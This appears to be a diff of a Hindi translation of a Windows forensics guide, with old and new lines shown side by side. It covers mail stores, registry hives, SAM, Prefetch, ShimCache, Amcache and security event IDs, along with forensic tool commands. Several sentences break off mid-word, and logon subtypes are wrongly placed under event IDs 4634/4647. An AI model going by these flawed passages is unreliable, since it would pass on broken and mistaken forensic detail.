इसके अलावा, `References` और `In-Reply-To` हेडर्स में आप मेसेज की आईडी पा सकते हैं:
|
||||
इसके अलावा, `References` और `In-Reply-To` हेडर्स में आप संदेशों का आईडी पा सकते हैं:
|
||||
|
||||
![](<../../../.gitbook/assets/image (484).png>)
|
||||
|
||||
### Windows मेल ऐप
|
||||
### Windows Mail App
|
||||
|
||||
यह एप्लिकेशन ईमेल को HTML या पाठ में सहेजता है। आप ईमेल को नीचे उपफ़ोल्डर में पा सकते हैं `\Users\<username>\AppData\Local\Comms\Unistore\data\3\`। ईमेल `.dat` एक्सटेंशन के साथ सहेजे जाते हैं।
|
||||
यह एप्लिकेशन ईमेल को HTML या पाठ में सहेजता है। आप ईमेल को ढूंढ सकते हैं `\Users\<username>\AppData\Local\Comms\Unistore\data\3\` के अंदर सबफ़ोल्डर्स में। ईमेल `.dat` एक्सटेंशन के साथ सहेजे जाते हैं।
|
||||
|
||||
ईमेलों की **मेटाडेटा** और **संपर्क** को **EDB डेटाबेस** में पाया जा सकता है: `\Users\<username>\AppData\Local\Comms\UnistoreDB\store.vol`
|
||||
ईमेलों की **मेटाडेटा** और **संपर्क** को **EDB डेटाबेस** के अंदर पाया जा सकता है: `\Users\<username>\AppData\Local\Comms\UnistoreDB\store.vol`
|
||||
|
||||
फ़ाइल का एक्सटेंशन **बदलें** `.vol` से `.edb` और आप इसे खोलने के लिए उपकरण [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) का उपयोग कर सकते हैं। `Message` टेबल के अंदर आप ईमेल देख सकते हैं।
|
||||
फ़ाइल का एक्सटेंशन **बदलें** `.vol` से `.edb` और आप इसे खोलने के लिए उपकरण [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) का उपयोग कर सकते हैं। `Message` तालिका के अंदर आप ईमेल देख सकते हैं।
|
||||
|
||||
### Microsoft Outlook
|
||||
|
||||
जब Exchange सर्वर या Outlook क्लाइंट का उपयोग किया जाता है तो कुछ MAPI हेडर्स होते हैं:
|
||||
|
||||
* `Mapi-Client-Submit-Time`: ईमेल भेजे जाने का समय
|
||||
* `Mapi-Conversation-Index`: थ्रेड के बच्चों की संख्या और हर मेसेज के समय का चिन्हांक
|
||||
* `Mapi-Entry-ID`: मेसेज पहचानकर्ता।
|
||||
* `Mappi-Message-Flags` और `Pr_last_Verb-Executed`: MAPI क्लाइंट के बारे में जानकारी (मेसेज पढ़ा गया? पढ़ा नहीं गया? प्रतिक्रिया दी गई? पुनर्निर्देशित किया गया? बाहर ऑफिस?)
|
||||
* `Mapi-Conversation-Index`: थ्रेड के बच्चों के संदेशों की संख्या और प्रत्येक संदेश का समयचिह्न
|
||||
* `Mapi-Entry-ID`: संदेश पहचानकर्ता।
|
||||
* `Mappi-Message-Flags` और `Pr_last_Verb-Executed`: MAPI क्लाइंट के बारे में जानकारी (संदेश पढ़ा गया? पढ़ा नहीं गया? प्रतिक्रिया दी गई? पुनर्निर्देशित किया गया? आफिस से बाहर?)
|
||||
|
||||
Microsoft Outlook क्लाइंट में
|
||||
Microsoft Outlook क्लाइंट में, सभी भेजे गए/प्राप्त किए गए सं
|
||||
### Microsoft Outlook OST Files
|
||||
|
||||
एक **OST फ़ाइल** Microsoft Outlook द्वारा उत्पन्न की जाती है जब यह **IMAP** या **Exchange** सर्वर के साथ कॉन्फ़िगर किया जाता है, जो एक PST फ़ाइल के समान जानकारी संग्रहित करती है। यह फ़ाइल सर्वर के साथ समकलीन होती है, **पिछले 12 महीने** तक के डेटा को **अधिकतम 50GB** आकार तक रखती है, और PST फ़ाइल के समान निर्देशिका में स्थित है। एक OST फ़ाइल देखने के लिए, [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) का उपयोग किया जा सकता है।
|
||||
एक **OST फ़ाइल** Microsoft Outlook द्वारा उत्पन्न की जाती है जब यह **IMAP** या **Exchange** सर्वर के साथ कॉन्फ़िगर किया गया होता है, जो एक PST फ़ाइल के समान जानकारी संग्रहित करती है। यह फ़ाइल सर्वर के साथ समकलीन होती है, **पिछले 12 महीने** तक के डेटा को **अधिकतम 50GB** आकार तक रखती है, और PST फ़ाइल के समान निर्देशिका में स्थित है। एक OST फ़ाइल देखने के लिए, [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html) का उपयोग किया जा सकता है।
|
||||
|
||||
### अटैचमेंट पुनः प्राप्त करना
|
||||
|
||||
खो गए अटैचमेंट को निम्नलिखित से पुनः प्राप्त किया जा सकता है:
|
||||
खो गए अटैचमेंट को निम्नलिखित स्थान से पुनः प्राप्त किया जा सकता है:
|
||||
|
||||
- **IE10 के लिए**: `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook`
|
||||
- **IE11 और ऊपर के लिए**: `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook`
|
||||
|
||||
### Thunderbird MBOX Files
|
||||
|
||||
**Thunderbird** डेटा संग्रहित करने के लिए **MBOX फ़ाइलें** का उपयोग करता है, जो `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles` में स्थित है।
|
||||
**Thunderbird** MBOX फ़ाइलें डेटा संग्रहित करने के लिए उपयोग करता है, जो `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles` में स्थित है।
|
||||
|
||||
### छवि थंबनेल्स
|
||||
|
||||
- **Windows XP और 8-8.1**: थंबनेल्स के साथ एक फ़ोल्डर तक पहुँचने पर `thumbs.db` फ़ाइल उत्पन्न होती है जो छवि पूर्वावलोकन संग्रहित करती है, भले ही उसके हटाने के बाद भी।
|
||||
- **Windows 7/10**: `thumbs.db` उत्पन्न होती है जब UNC पथ के माध्यम से नेटवर्क के माध्यम से पहुँचा जाता है।
|
||||
- **Windows XP और 8-8.1**: थंबनेल्स के साथ एक फ़ोल्डर तक पहुँचने पर, एक `thumbs.db` फ़ाइल उत्पन्न होती है जो छवि पूर्वावलोकन संग्रहित करती है, भले ही उसे हटा दिया गया हो।
|
||||
- **Windows 7/10**: `thumbs.db` उस समय उत्पन्न होती है जब यह एक नेटवर्क के माध्यम से UNC पथ के माध्यम से पहुँचा जाता है।
|
||||
- **Windows Vista और नएरे**: थंबनेल पूर्वावलोकन `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` में केंद्रीकृत है जिसमें फ़ाइलें **thumbcache\_xxx.db** नाम से होती हैं। [**Thumbsviewer**](https://thumbsviewer.github.io) और [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) इन फ़ाइलों को देखने के लिए उपकरण हैं।
|
||||
|
||||
### Windows रजिस्ट्री सूचना
|
||||
### Windows रजिस्ट्री जानकारी
|
||||
|
||||
Windows रजिस्ट्री, विभिन्न `HKEY_LOCAL_MACHINE` उपकीजों के लिए फ़ाइलों में संग्रहित व्यापक सिस्टम और उपयोगकर्ता गतिविधि डेटा संग्रहित करता है:
|
||||
Windows रजिस्ट्री, विस्तृत सिस्टम और उपयोगकर्ता गतिविधि डेटा संग्रहित करने वाला है, निम्नलिखित फ़ाइलों में समाहित है:
|
||||
|
||||
- विभिन्न `HKEY_LOCAL_MACHINE` उपकीजों के लिए `%windir%\System32\Config` में।
|
||||
- `HKEY_CURRENT_USER` के लिए `%UserProfile%{User}\NTUSER.DAT` में।
|
||||
- Windows Vista और उसके बाद के संस्करण `%Windir%\System32\Config\RegBack\` में `HKEY_LOCAL_MACHINE` रजिस्ट्री फ़ाइलें बैकअप करते हैं।
|
||||
- इसके अतिरिक्त, कार्यक्रम निष्पादन सूचना `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` में संग्रहित है Windows Vista और Windows 2008 सर्वर के बाद से।
|
||||
- विभिन्न `HKEY_LOCAL_MACHINE` सबकीज के लिए `%windir%\System32\Config`।
|
||||
- `HKEY_CURRENT_USER` के लिए `%UserProfile%{User}\NTUSER.DAT`।
|
||||
- Windows Vista और उसके बाद के संस्करण ने `%Windir%\System32\Config\RegBack\` में `HKEY_LOCAL_MACHINE` रजिस्ट्री फ़ाइलों का बैकअप बनाया।
|
||||
- इसके अतिरिक्त, कार्यक्रम निष्पादन जानकारी Windows Vista और Windows 2008 सर्वर के बाद से `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` में संग्रहित है।
|
||||
|
||||
### उपकरण
|
||||
|
||||
कुछ उपकरण रजिस्ट्री फ़ाइलों का विश्लेषण करने के लिए उपयोगी हैं:
|
||||
|
||||
* **रजिस्ट्री संपादक**: यह Windows में स्थापित है। यह वर्तमान सत्र की Windows रजिस्ट्री में नेविगेट करने के लिए एक GUI है।
|
||||
* [**रजिस्ट्री एक्सप्लोरर**](https://ericzimmerman.github.io/#!index.md): यह आपको रजिस्ट्री फ़ाइल लोड करने और उनमें नेविगेट करने की अनुमति देता है एक GUI के साथ। यह बुकमार्क्स शामिल करता है जो दिलचस्प जानकारी वाले कुंजियों को हाइलाइट करता है।
|
||||
* **रजिस्ट्री संपादक**: यह Windows में स्थापित है। यह वर्तमान सत्र के Windows रजिस्ट्री में नेविगेट करने के लिए एक GUI है।
|
||||
* [**रजिस्ट्री एक्सप्लोरर**](https://ericzimmerman.github.io/#!index.md): यह आपको रजिस्ट्री फ़ाइल लोड करने और उनमें नेविगेट करने की अनुमति देता है। यह बुकमार्क्स शामिल करता है जो दिलचस्प जानकारी वाले कुंजियों को हाइलाइट करता है।
|
||||
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): फिर से, इसमें एक GUI है जो लोड किए गए रजिस्ट्री में नेविगेट करने की अनुमति देता है और लोड किए गए रजिस्ट्री में दिलचस्प जानकारी को हाइलाइट करने वाले प्लगइन्स भी शामिल हैं।
|
||||
* [**Windows रजिस्ट्री रिकवरी**](https://www.mitec.cz/wrr.html): एक और GUI एप्लिकेशन जो रजिस्ट्री से महत्वपूर्ण जानकारी निकालने की क्षमता रखता है।
|
||||
* [**Windows रजिस्ट्री रिकवरी**](https://www.mitec.cz/wrr.html): एक और GUI एप्लिकेशन जो रजिस्ट्री से महत्वपूर्ण जानकारी निकालने में सक्षम है।
|
||||
|
||||
### हटाए गए तत्व को पुनः प्राप्त करना
|
||||
|
||||
जब एक कुंजी हटाई जाती है तो उसे ऐसा चिह्नित किया जाता है, लेकिन जब तक वह जगह जिसे वह धारण कर रही है आवश्यक नहीं होती, तब तक वह हटाया नहीं जाएगा। इसलिए, **रजिस्ट्री एक्सप्लोरर** जैसे उपकरण का उपयोग करके इन हटाए गए कुंजियों को पुनः प्राप्त किया जा सकता है।
|
||||
जब एक कुंजी हटाई जाती है तो उसे ऐसा चिह्नित किया जाता है, लेकिन जब तक वह जगह जिसे यह धारण कर रही है उसकी आवश्यकता न हो, तब तक यह हटाया नहीं जाएगा। इसलिए, **रजिस्ट्री एक्सप्लोरर** जैसे उपकरण का उपयोग करके इन हटाए गए कुंजियों को पुनः प्राप्त किया जा सकता है।
|
||||
|
||||
### अंतिम लेखन समय
|
||||
|
||||
|
@ -263,9 +264,9 @@ Windows रजिस्ट्री, विभिन्न `HKEY_LOCAL_MACHINE`
|
|||
|
||||
### SAM
|
||||
|
||||
फ़ाइल/हाइव **SAM** में सिस्टम के **उपयोगकर्ता, समूह और उपयोगकर्ता पासवर्ड** हैश संग्रहित होते हैं।
|
||||
फ़ाइल/हाइव **SAM** में सिस्टम के **उपयोगकर्ता, समूह और उपयोगकर्ता पासवर्ड** हैश होते हैं।
|
||||
|
||||
`SAM\Domains\Account\Users` में आप उपयोगकर्ता नाम, RID, अंतिम लॉगिन, अंतिम विफल लॉगिन, लॉगिन काउंटर, पासवर्ड नीति और खाता बनाया गया था की जानकारी प्राप्त कर सकते हैं। **हैश** प्राप्त करने के लिए आपको फ़ाइल/हाइव **SYSTEM** की भी **आवश्यकता** है।
|
||||
`SAM\Domains\Account\Users` में आप उपयोगकर्ता नाम, RID, अंतिम लॉगिन, अंतिम विफल लॉगिन, लॉगिन काउंटर, पासवर्ड नीति और खाता बनाया गया था कब तक प्राप्त कर सकते हैं। **हैश** प्राप्त करने के लिए आपको फ़ाइल/हाइव **SYSTEM** की भी **आवश्यकता** है।
|
||||
|
||||
### Windows रजिस्ट्री में दिलचस्प प्रविष्टियाँ
|
||||
|
||||
|
@ -273,27 +274,27 @@ Windows रजिस्ट्री, विभिन्न `HKEY_LOCAL_MACHINE`
|
|||
[interesting-windows-registry-keys.md](interesting-windows-registry-keys.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## निष्पादित कार्यक्रम
|
||||
## कार्यक्रम निष्पादित
|
||||
|
||||
### मौलिक Windows प्रक्रियाएँ
|
||||
|
||||
[इस पोस्ट](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) में आप संदेहात्मक व्यवहार का पता लगाने के लिए सामान्य Windows प्रक्रियाओं के बारे में सीख सकते हैं।
|
||||
[इस पोस्ट](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) में आप संदेहास्पद व्यवहार का पता लगाने के लिए सामान्य Windows प्रक्रियाओं के बारे में सीख सकते हैं।
|
||||
|
||||
### Windows हाल के APPs
|
||||
|
||||
रजिस्ट्री `NTUSER.DAT` में पथ `Software\Microsoft\Current Version\Search\RecentApps` में आप **निष्पादित एप्लिकेशन**, **अंतिम समय** जब यह निष्पादित किया गया था, और **कितनी बार** यह चलाया गया था के बारे में जानकारी संग्रहित करने वाली सबकीज हो सकती है।
|
||||
रजिस्ट्री `NTUSER.DAT` में पथ `Software\Microsoft\Current Version\Search\RecentApps` में आप **एप्लिकेशन निष्पादित**, **अंतिम समय** जब यह निष्पादित किया गया था, और **कितनी बार** यह चलाया गया था के बारे में जानकारी वाले सबकीज प्राप्त कर सकते हैं।
|
||||
|
||||
### BAM (पृष्ठभूमि गतिविधि नियंत्रक)
|
||||
|
||||
आप रजिस्ट्री संपादक के साथ `SYSTEM` फ़ाइल खोल सकते हैं और पथ `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` में आप प्रत्येक उपयोगकर्ता द्वारा निष्पादित **एप्लिकेशन की जानकारी** (पथ में `{SID}` ध्यान दें) और **कब** वे निष्पादित किए गए थे (समय रजिस्ट्री के डेटा मान में होता है) प्राप्त कर सकते हैं।
|
||||
आप रजिस्ट्री संपादक के साथ `SYSTEM` फ़ाइल खोल सकते हैं और पथ `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` में आप प्रत्येक उपयोगकर्ता द्वारा **निष्पादित एप्लिकेशन की जानकारी** (पथ में `{SID}` का ध्यान दें) और **कब** वे निष्पादित किए गए थे (समय रजिस्ट्री के डेटा मान में होता है) प्राप्त कर सकते हैं।
|
||||
|
||||
### Windows Prefetch
|
||||
|
||||
प्रीफेचिंग एक तकनीक है जो एक कंप्यूटर को चुपचाप **उसे आवश्यक संसाधन लाने की अनुमति देती है जो एक उपयोगकर्ता निकट भविष्य में पहुँच सकता है** ताकि संसाधन तेजी से पहुँचे जा सकें।
|
||||
प्रीफेचिंग एक तकनीक है जो एक कंप्यूटर को चुपचाप **उन आवश्यक संसाधनों को लाने की अनुमति देती है जो एक उपयोगकर्ता निकट भविष्य में पहुँच सकता है** ताकि संसाधनों को तेजी से पहुँचा जा सके।
|
||||
|
||||
Windows प्रीफेच में **निष्पादित कार्यक्रमों के कैश** बनाने से उन्हें तेजी से लोड करने की क्षमता होती है। ये कैशेज `.pf` फ़ाइलें बनाते हैं पथ में: `C:\Windows\Prefetch`। XP/VISTA/WIN7 में 128 फ़ाइलों की सीमा होती है और Win8/Win10 में 1024 फ़ाइलें होती हैं।
|
||||
|
||||
फ़ाइल नाम `{प्रोग्राम_नाम}-{हैश}.pf` के रूप में बनाई जाती है (हैश पथ और कार्यक्रम के तर्कों पर आधारित है)। W10 में ये फ़ाइलें संकुचित होती हैं। ध्यान दें कि फ़ाइल की केवल मौज
|
||||
फ़ाइल का नाम `{प्रोग्राम_नाम}-{हैश}.pf` बनाया जाता है (हैश पथ और कार्यक्रम के तर्कों पर आधारित है)। W10 में ये फ़ाइलें संकुचित होती हैं। ध्यान दें कि फ़ाइल की केवल मौजूदगी इस बात का संक
|
||||
```bash
|
||||
.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
|
||||
```
|
||||
|
@ -310,11 +311,11 @@ Windows प्रीफेच में **निष्पादित कार
|
|||
|
||||
### SRUM
|
||||
|
||||
**सिस्टम रिसोर्स यूज़ेज मॉनिटर** (SRUM) **प्रक्रिया द्वारा उपयोग किए गए संसाधनों** का **निगरानी** करता है। यह W8 में प्रकट हुआ और डेटा को `C:\Windows\System32\sru\SRUDB.dat` में स्थित एक ESE डेटाबेस में संग्रहित करता है।
|
||||
**सिस्टम रिसोर्स उपयोग मॉनिटर** (SRUM) **प्रक्रिया द्वारा उपयोग किए गए संसाधनों** का **निगरानी** करता है। यह W8 में प्रकट हुआ और यह डेटा को `C:\Windows\System32\sru\SRUDB.dat` में स्थित एक ESE डेटाबेस में संग्रहित करता है।
|
||||
|
||||
यह निम्नलिखित जानकारी प्रदान करता है:
|
||||
|
||||
* एप्लिकेशन आईडी और पथ
|
||||
* ऐपआईडी और पथ
|
||||
* प्रक्रिया को चलाने वाला उपयोगकर्ता
|
||||
* भेजे गए बाइट्स
|
||||
* प्राप्त बाइट्स
|
||||
|
@ -334,14 +335,14 @@ Windows प्रीफेच में **निष्पादित कार
|
|||
|
||||
- फ़ाइल का पूरा पथ
|
||||
- फ़ाइल का आकार
|
||||
- Last Modified time under **$Standard\_Information** (SI)
|
||||
- Last Updated time of the ShimCache
|
||||
- Process Execution Flag
|
||||
- **$Standard\_Information** (SI) के तहत अंतिम संशोधित समय
|
||||
- ShimCache का अंतिम अपडेट समय
|
||||
- प्रक्रिया निष्पादन ध्वज
|
||||
|
||||
Such data is stored within the registry at specific locations based on the version of the operating system:
|
||||
ऐसे डेटा को रजिस्ट्री में रखा जाता है विशेष स्थानों पर आधारित होता है ऑपरेटिंग सिस्टम के संस्करण पर:
|
||||
|
||||
- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries.
|
||||
- उपसर्वर 2003 के लिए, साथ ही Windows संस्करण 2008, 2012, 2016, 7, 8, और 10 के लिए, स्टोरेज पथ `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache` है, जिसमें 512 और 1024 एंट्री को समाहित किया गया है।
|
||||
- XP के लिए, डेटा `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` के तहत संग्रहीत होता है जिसमें 96 एंट्री की क्षमता होती है।
|
||||
- सर्वर 2003, साथ ही Windows संस्करण 2008, 2012, 2016, 7, 8, और 10 के लिए, स्टोरेज पथ `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache` होता है, जिसमें 512 और 1024 एंट्री की क्षमता होती है।
|
||||
|
||||
संग्रहित जानकारी को पार्स करने के लिए, [**AppCompatCacheParser** टूल](https://github.com/EricZimmerman/AppCompatCacheParser) का उपयोग करना सुझावित है।
|
||||
|
||||
|
@ -349,15 +350,15 @@ Such data is stored within the registry at specific locations based on the versi
|
|||
|
||||
### Amcache
|
||||
|
||||
**Amcache.hve** फ़ाइल मुख्य रूप से एक रजिस्ट्री हाइव है जो एक सिस्टम पर निष्पादित की गई एप्लिकेशनों के विवरण को लॉग करता है। आमतौर पर यह `C:\Windows\AppCompat\Programas\Amcache.hve` पर पाया जाता है।
|
||||
**Amcache.hve** फ़ाइल मूल रूप से एक रजिस्ट्री हाइव है जो एक सिस्टम पर निष्पादित की गई एप्लिकेशनों के बारे में विवरण लॉग करता है। यह सामान्यत: `C:\Windows\AppCompat\Programas\Amcache.hve` पर पाया जाता है।
|
||||
|
||||
यह फ़ाइल हाल ही में निष्पादित प्रक्रियाओं के रिकॉर्ड संग्रहित करने के लिए महत्वपूर्ण है, जिसमें निष्पादनीय फ़ाइलों के पथ और उनके SHA1 हैश शामिल हैं। यह जानकारी सिस्टम पर एप्लिकेशनों की गतिविधि का ट्रैकिंग करने के लिए अमूल्य है।
|
||||
यह फ़ाइल हाल ही में निष्पादित प्रक्रियाओं के रिकॉर्ड संग्रहित करने के लिए प्रमुख है, जिसमें निष्पादनी फ़ाइलों के पथ और उनके SHA1 हैश शामिल हैं। यह जानकारी सिस्टम पर एप्लिकेशनों की गतिविधि का ट्रैकिंग करने के लिए अमूल्य है।
|
||||
|
||||
**Amcache.hve** से डेटा निकालने और विश्लेषण करने के लिए, [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) टूल का उपयोग किया जा सकता है। निम्नलिखित कमांड एक उदाहरण है कि AmcacheParser का उपयोग कैसे किया जाए **Amcache.hve** फ़ाइल की सामग्री को पार्स करने और परिणामों को CSV प्रारूप में निकालने के लिए:
|
||||
**Amcache.hve** से डेटा निकालने और विश्लेषण करने के लिए, [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) टूल का उपयोग किया जा सकता है। निम्नलिखित कमांड एक उदाहरण है कि AmcacheParser का उपयोग कैसे किया जाता है **Amcache.hve** फ़ाइल की सामग्री को पार्स करने और परिणामों को CSV प्रारूप में आउटपुट करने के लिए:
|
||||
```bash
|
||||
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
|
||||
```
|
||||
में उत्पन्न CSV फ़ाइलों में, `Amcache_Unassociated file entries` विशेष रूप से महत्वपूर्ण है क्योंकि यह असंबद्ध फ़ाइल प्रविष्टियों के बारे में विविध जानकारी प्रदान करता है।
|
||||
में उत्पन्न CSV फ़ाइलों में, `Amcache_Unassociated file entries` विशेष रूप से महत्वपूर्ण है क्योंकि यह असंबद्ध फ़ाइल प्रविष्टियों के बारे में विस्तृत जानकारी प्रदान करता है।
|
||||
|
||||
सबसे दिलचस्प CVS फ़ाइल जो उत्पन्न होती है, वह है `Amcache_Unassociated file entries`।
|
||||
|
||||
|
@ -377,40 +378,68 @@ AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\gen
|
|||
|
||||
### **Windows Store**
|
||||
|
||||
स्थापित एप्लिकेशन `\ProgramData\Microsoft\Windows\AppRepository\` में पाए जा सकते हैं।
|
||||
इस भंडार में एक **लॉग** है जिसमें प्रत्येक एप्लिकेशन की स्थापना की गई है जो तंत्र में है डेटाबेस **`StateRepository-Machine.srd`**।
|
||||
स्थापित एप्लिकेशन `\ProgramData\Microsoft\Windows\AppRepository\` में पाई जा सकती हैं।
|
||||
इस भंडार में एक **लॉग** है जिसमें प्रत्येक एप्लिकेशन की स्थापना की गई है जो डेटाबेस **`StateRepository-Machine.srd`** के अंदर सिस्टम में।
|
||||
|
||||
इस डेटाबेस के एप्लिकेशन तालिका में, "एप्लिकेशन आईडी", "पैकेज नंबर", और "प्रदर्शन नाम" मिल सकते हैं। ये स्तंभ पूर्व स्थापित और स्थापित एप्लिकेशनों के बारे में जानकारी रखते हैं और यह पता लगाया जा सकता है कि क्या कुछ एप्लिकेशन अनइंस्टॉल किए गए थे क्योंकि स्थापित एप्लिकेशनों के आईडी सतत होने चाहिए।
|
||||
इस डेटाबेस के एप्लिकेशन तालिका के अंदर, "एप्लिकेशन आईडी", "पैकेज नंबर", और "प्रदर्शन नाम" पाए जा सकते हैं। ये स्तंभ पूर्व स्थापित और स्थापित एप्लिकेशनों के बारे में जानकारी रखते हैं और यह पता लगाया जा सकता है कि क्या कुछ एप्लिकेशन अनइंस्टॉल किए गए थे क्योंकि स्थापित एप्लिकेशनों के आईडी सतत होने चाहिए।
|
||||
|
||||
रजिस्ट्री पथ में भी स्थापित एप्लिकेशन पाए जा सकते हैं: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
|
||||
रजिस्ट्री पथ के अंदर भी **स्थापित एप्लिकेशन** पाए जा सकते हैं: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
|
||||
और **अनइंस्टॉल** **एप्लिकेशन** में: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
|
||||
|
||||
## Windows घटनाएँ
|
||||
## Windows घटनाएं
|
||||
|
||||
Windows घटनाओं में जो जानकारी दिखाई देती है:
|
||||
Windows घटनाओं के अंदर जो जानकारी आती है:
|
||||
|
||||
* क्या हुआ
|
||||
* टाइमस्टैम्प (UTC + 0)
|
||||
* शामिल हुए उपयोगकर्ता
|
||||
* शामिल हुए होस्ट (होस्टनाम, आईपी)
|
||||
* पहुंचे गए संपत्तियाँ (फ़ाइलें, फ़ोल्डर, प्रिंटर, सेवाएँ)
|
||||
* एसेट्स तक पहुंचा (फ़ाइलें, फ़ोल्डर, प्रिंटर, सेवाएं)
|
||||
|
||||
लॉग `C:\Windows\System32\config` में पहले Windows Vista से पहले और `C:\Windows\System32\winevt\Logs` में Windows Vista के बाद स्थित हैं। Windows Vista से पहले, इवेंट लॉग बाइनरी प्रारूप में थे और इसके बाद, वे **XML प्रारूप** में हैं और **.evtx** एक्सटेंशन का उपयोग करते हैं।
|
||||
लॉग `C:\Windows\System32\config` में पहले Windows Vista से पहले और `C:\Windows\System32\winevt\Logs` में Windows Vista के बाद स्थित हैं। Windows Vista से पहले, इवेंट लॉग्स बाइनरी प्रारूप में थे और इसके बाद, वे **XML प्रारूप** में हैं और **.evtx** एक्सटेंशन का उपयोग करते हैं।
|
||||
|
||||
इवेंट फ़ाइलों की स्थिति सिस्टम रजिस्ट्री में मिल सकती है **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
|
||||
इवेंट फ़ाइलों की स्थिति को **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** में पा सकते हैं
|
||||
|
||||
इन्हें Windows इवेंट व्यूअर (**`eventvwr.msc`**) से देखा जा सकता है या [**इवेंट लॉग एक्सप्लोरर**](https://eventlogxp.com) **या** [**Evtx एक्सप्लोरर/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)** जैसे अन्य उपकरणों के साथ।**
|
||||
इन्हें Windows इवेंट व्यूअर (**`eventvwr.msc`**) से देखा जा सकता है या [**Event Log Explorer**](https://eventlogxp.com) जैसे अन्य उपकरणों के साथ देखा जा सकता है **या** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**।**
|
||||
|
||||
## Windows सुरक्षा इवेंट लॉगिंग को समझना
|
||||
|
||||
सुरक्षा विन्यास फ़ाइल में एक्सेस इवेंट रिकॉर्ड किए जाते हैं जो `C:\Windows\System32\winevt\Security.evtx` में स्थित है। इस फ़ाइल का आकार समायोज्य है, और जब इसकी क्षमता पूरी हो जाती है, पुराने इवेंट ओवरराइट हो जाते हैं। रिकॉर्ड किए गए इवेंट में उपयोगकर्ता लॉगिन और लॉगऑफ, उपयोगकर्ता क्रियाएँ, और सुरक्षा सेटिंग्स में परिवर्तनों के साथ, साथ ही फ़ाइल, फ़ोल्डर, और साझा संपत्ति एक्सेस भी शामिल हैं।
|
||||
सुरक्षा विन्यास फ़ाइल में एक्सेस इवेंट रिकॉर्ड किए जाते हैं जो `C:\Windows\System32\winevt\Security.evtx` में स्थित है। इस फ़ाइल का आकार समायोज्य है, और जब इसकी क्षमता पूरी हो जाती है, पुराने इवेंट ओवरराइट हो जाते हैं। रिकॉर्ड किए गए इवेंट में उपयोगकर्ता लॉगिन और लॉगआउट, उपयोगकर्ता क्रियाएँ, और सुरक्षा सेटिंग्स में परिवर्तन, साथ ही फ़ाइल, फ़ोल्डर, और साझा एसेट एक्सेस भी शामिल हैं।
|
||||
|
||||
### उपयोगकर्ता प्रमाणीकरण के लिए मुख्य इवेंट आईडी:
|
||||
|
||||
- **EventID 4624**: उपयोगकर्ता सफलतापूर्वक प्रमाणीकृत है।
|
||||
- **EventID 4625**: प्रमाणीकरण विफलता की संकेत देता है।
|
||||
- **EventIDs 4634/4647**: उपयोगकर्ता लॉगऑफ इवेंट को प्रस्तुत करता है।
|
||||
- **EventID 4672**: प्रबंधनीय विशेषाधिकारों के साथ लॉगिन को दर्शाता है।
|
||||
- **इवेंट आईडी 4624**: उपयोगकर्ता सफलतापूर्वक प्रमाणीकृत है।
|
||||
- **इवेंट आईडी 4625**: प्रमाणीकरण विफलता की संकेत देता है।
|
||||
- **इवेंट आईडी 4634/4647**: उपयोगकर्ता लॉगआउट इवेंट को प्रस्तुत करता है।
|
||||
- **इवेंट आईडी 4672**: प्रबंधनीय विशेषाधिकारों के साथ लॉगिन को दर्शाता है।
|
||||
|
||||
#### इवेंट आईडी 4634/4647 के अंदर उप-प्रकार:
|
||||
|
||||
- **इंटरैक्टिव (2)**: सीधे उपयोगकर्ता लॉगिन।
|
||||
- **नेटवर्क (3)**: साझा फ़ोल्डरों तक पहुंच।
|
||||
- **बैच (4)**: बैच प्रक्रियाओं का क्रियान्वयन।
|
||||
- **सेवा (5)**: सेवा लॉन्च।
|
||||
- **प्रॉक्सी (6)**: प्रॉक्सी प्रमाणीकरण।
|
||||
- **अनलॉक (7)**: पासवर्ड के साथ स्क्रीन अनलॉक।
|
||||
- **नेटवर्क क्लियरटेक्स्ट (8)**: क्लियर टेक्स्ट पासवर्ड प्रसारण, अक्सर IIS से।
|
||||
- **नए प्रमाणीकरण (9)**: पहुंच के लिए विभिन्न प्रमाणीकरण का उपयोग।
|
||||
- **रिमोट इंटरैक्टिव (10)**: रिमोट डेस्कटॉप या टर्मिनल सेवाओं लॉगिन।
|
||||
- **कैश इंटरैक्टिव (11)**: डोमेन कंट्रोलर से संपर्क के बिना कैश उपयोगकर्ता पहुंच।
|
||||
